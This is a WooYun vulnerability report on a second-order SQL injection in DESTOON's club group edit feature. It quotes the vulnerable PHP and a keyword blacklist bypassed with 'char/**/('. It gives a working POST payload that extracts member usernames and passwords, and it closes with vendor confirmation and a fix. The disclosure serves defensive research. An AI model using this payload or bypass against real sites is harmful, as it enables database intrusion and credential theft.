

缺陷编号:wooyun-2015-0151369

漏洞标题:destoon最新版注入(绕过过滤出任意数据)

相关厂商:DESTOON

漏洞作者: 玉林嘎

提交时间:2015-11-03 11:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

我会告诉你是三次注入么.

详细说明:

destoon最新版
漏洞文件:/module/club/my_group.inc.php

// 'add' branch: create a new club group for the logged-in member.
// assumes $mid, $job, $submit, $post, $catid, $cityid and the $_username
// session value were set by the including script — not visible here.
case 'add':
// Enforce the per-member group quota before showing the form or saving.
if($MG['club_group_limit'] && $limit_used >= $MG['club_group_limit']) dalert(lang($L['info_limit'], array($MG['club_group_limit'], $limit_used)), $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job);
// A module setting of 2 defers to the member-group setting; any other value applies as-is.
$need_captcha = $MOD['captcha_group'] == 2 ? $MG['captcha'] : $MOD['captcha_group'];
$need_question = $MOD['question_group'] == 2 ? $MG['question'] : $MOD['question_group'];
if($submit) {
// Captcha and security-question checks; dalert() aborts the request on failure.
$msg = captcha($captcha, $need_captcha, true);
if($msg) dalert($msg);
$msg = question($answer, $need_question, true);
if($msg) dalert($msg);
// The owner is always the session user, whatever the request carried.
$post['username'] = $_username;
// $do->pass() is the model's validation step (group.class.php, not shown here).
if($do->pass($post)) {
$CAT = get_cat($post['catid']);
// Note: $CAT is empty when this fires, so the message never carries a category name.
if(!$CAT) dalert(lang($L['group'], array($CAT['catname'])));
// Server-controlled fields are reset here so the request cannot set them.
$post['addtime'] = $post['level'] = $post['fee'] = 0;
$post['style'] = $post['template'] = $post['note'] = $post['filepath'] = '';
$need_check = $MOD['check_group'] == 2 ? $MG['check'] : $MOD['check_group'];
$post['status'] = get_status(3, $need_check);
$post['hits'] = 0;
$post['areaid'] = $cityid;
$post['filepath'] = '';
$do->add($post);
// Status 2 means the group still awaits moderation (see get_status above).
$msg = $post['status'] == 2 ? $L['success_check'] : $L['success_add'];
$js = '';
set_cookie('dmsg', $msg);
$forward = $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job.'&status='.$post['status'];
$msg = '';
// Redirect the parent frame once the alert page has loaded.
$js .= 'window.onload=function(){parent.window.location="'.$forward.'";}';
dalert($msg, '', $js);
} else {
// Validation failed: show the model's error and refresh captcha/question if in use.
dalert($do->errmsg, '', ($need_captcha ? reload_captcha() : '').($need_question ? reload_question() : ''));
}
} else {
// Form display: blank every model field (variable variables), then preset
// the category and area.
foreach($do->fields as $v) {
$$v = '';
}
$content = '';
$catid = intval($catid);
$areaid = $cityid;
$item = array();
}
break;
// 'edit' branch: update an existing group owned by the current member.
case 'edit':
$itemid or message();
$do->itemid = $itemid;
// The stored row, fetched as-is from the database.
$item = $do->get_one();
// Ownership check: only the creator may edit.
if(!$item || $item['username'] != $_username) message();
if($submit) {
$post['username'] = $_username;
if($do->pass($post)) {
// Fields the member may not change are restored from the stored row, so
// their values reach $do->edit() exactly as stored — nothing in this branch
// re-escapes them before they are interpolated into SQL (see edit() in
// group.class.php). Request-supplied keys such as thumb/content stay in $post
// alongside them.
$post['catid'] = $item['catid'];
$post['title'] = $item['title'];
$post['level'] = $item['level'];
$post['fee'] = $item['fee'];
$post['style'] = $item['style'];
$post['template'] = $item['template'];
$post['filepath'] = $item['filepath'];
$post['status'] = $item['status'];
$post['hits'] = $item['hits'];
$do->edit($post);
set_cookie('dmsg', $L['success_edit']);
dalert('', '', 'parent.window.location="'.$forward.'"');
} else {
dalert($do->errmsg);
}
} else {
// Form display: every column of the stored row becomes a local variable.
extract($item);
}
break;


首先通过add操作 可引入\
而在edit操作中
$item = $do->get_one(); 直接取出
$item['title'] 被原样赋给 $post 后传入 edit() 函数，中间没有任何转义或过滤
而在文件:/module/club/group.class.php (add() edit()所在文件)

function edit($post) {
    // delete(..., false) runs before the update — presumably it clears data
    // derived from the old row rather than the row itself; confirm in this
    // class. set() normalises the incoming fields (defined elsewhere here).
    $this->delete($this->itemid, false);
    $post = $this->set($post);
    // Build the SET list in the order the keys appear in $post, keeping only
    // known columns. Each value is interpolated verbatim: any value that is
    // not already escaped for the SQL context at this point (for example a
    // backslash stored in an earlier row and copied back by the caller)
    // becomes part of the statement. Escaping, or parameterisation, belongs
    // here, applied once and consistently to every value.
    $assignments = array();
    foreach($post as $field=>$value) {
        if(in_array($field, $this->fields)) $assignments[] = "$field='$value'";
    }
    $sql = implode(',', $assignments);
    $this->db->query("UPDATE {$this->table} SET $sql WHERE itemid=$this->itemid");
    $this->update($this->itemid);
    clear_upload($post['thumb']);
    return true;
}


$post 数组里不仅有之前从数据库取出的字段，也有通过 POST 传入的 $post['thumb'] 和 $post['content']；
这两个变量在后面拼接的 UPDATE 语句中恰好排在 $title 之后，于是可以通过 $title 引入 \ 来转义掉后面的 '，再控制后一个参数进行注入
漏洞大概原理如此 其他下面说

漏洞证明:

证明:
注册个企业会员 创建商圈 title处引入\

1.png


然后在编辑

2.jpg


然后你会发现 thumb 和 content 传入的先后顺序，就是它们在 UPDATE 语句中出现的先后顺序；而 thumb 会经过一个 is_url 的检测，不可控制，所以先传入 content 即可解决
接下来是绕过过滤的问题了

// Keyword-blacklist filter for values headed into SQL. With $type truthy the
// pattern list below is applied to $string (arrays are filtered element-wise,
// recursing with the default $type); otherwise the character-substitution
// branch runs.
// NOTE(review): in this copy every $replace entry is byte-identical to the
// text its pattern matches (and both str_replace arrays are the same), so the
// function as printed returns its input unchanged. Presumably the shipped
// source substitutes distinguishable characters that were lost when the page
// was captured — confirm against the original file.
// The function-name patterns allow only whitespace ([\s]*) between the name
// and "(", so a sequence such as "char/**/(" (quoted on this page) is not
// matched. A keyword blacklist of this kind is not a substitute for escaping
// every value for its SQL context, or for parameterised queries.
function strip_sql($string, $type = 1) {
$match = array("/union/i","/where/i","/having/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\{\(\+@`])/i","/update([\s\*\/\-\{\(\+@`])/i","/replace([\s\*\/\-\{\(\+@`])/i","/delete([\s\*\/\-\{\(\+@`])/i","/drop([\s\*\/\-\{\(\+@`])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/right[\s]*\(/i","/mid[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/bin[\s]*\(/i","/oct[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i","/conv[\s]*\(/i");
$replace = array('union','where','having','outfile','dumpfile','0x\\1','select\\1from','select\\1','update\\1','replace\\1','delete\\1','drop\\1','load_file(','substring(','substr(','left(','right(','mid(','concat(','concat_ws(','make_set(','ascii(','bin(','oct(','hex(','ord(','char(','conv(');
if($type) {
// Recursive call uses the default $type, which is the same branch as here.
return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
} else {
return str_replace(array('d', 'e', 'g', 'i', 'm', 'n','p', 'r', 's', 't', 'v', 'x'), array('d', 'e', 'g', 'i', 'm', 'n', 'p', 'r', 's', 't', 'v', 'x'), $string);
}
}


细看你会发现这个过滤中所有 ascii( 、char( 之类的过滤方式都存在问题，例如 /char[\s]*\(/i

我们可以传入char/**/(1) 即可绕过 但是直接出数据不可能了 那我们更新好我们的语句
再一次编辑 再进行注入 这样就是3次注入啦
而且在edit() 中set() 中最后会进行次$post = dhtmlspecialchars($post);
所以直接引入 ' 还是不行，还是只能引入 \ 并通过两个参数配合注入
但是content是永远从post直接获取的 于是重新挑选

// Excerpt of the 'edit' branch above: these fields are restored from the
// stored row ($item, returned by $do->get_one()) rather than from the request,
// and are then handed to $do->edit() together with the request-supplied keys.
$post['catid'] = $item['catid'];
$post['title'] = $item['title'];
$post['level'] = $item['level'];
$post['fee'] = $item['fee'];
$post['style'] = $item['style'];
$post['template'] = $item['template'];
$post['filepath'] = $item['filepath'];
$post['status'] = $item['status'];
$post['hits'] = $item['hits'];


我们挑选template 和 filepath 配合注入
第一次编辑
content 应该是

post%5Bcontent%5D=,template=char/**/(92),filepath=char/**/(44,99,111,110,116,101,110,116,61,40,115,101,108,101,99,116,32,99,111,110,99,97,116,40,117,115,101,114,110,97,109,101,44,112,97,115,115,119,111,114,100,41,32,102,114,111,109,32,100,101,115,116,111,111,110,95,109,101,109,98,101,114,32,108,105,109,105,116,32,49,41,35)#


template 引入 \
filepath则是

,content=(select concat(username,password) from destoon_member limit 1)#


3.png


注意 content在前 thumb在后

5.png


之后再编辑一次
点进去就看到

QQ图片20151102205815.png


乌云编辑器\被转义啦。。。 - -

修复方案:

修复：进入 edit() 拼接 SQL 的所有字段值（包括从数据库取出后回填到 $post 的 $item 字段）都应统一按 SQL 语境转义，或改用参数化查询；strip_sql 这类关键字黑名单不能替代转义。

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-03 15:34

厂商回复:

感谢反馈 我们会尽快修复

最新状态:

暂无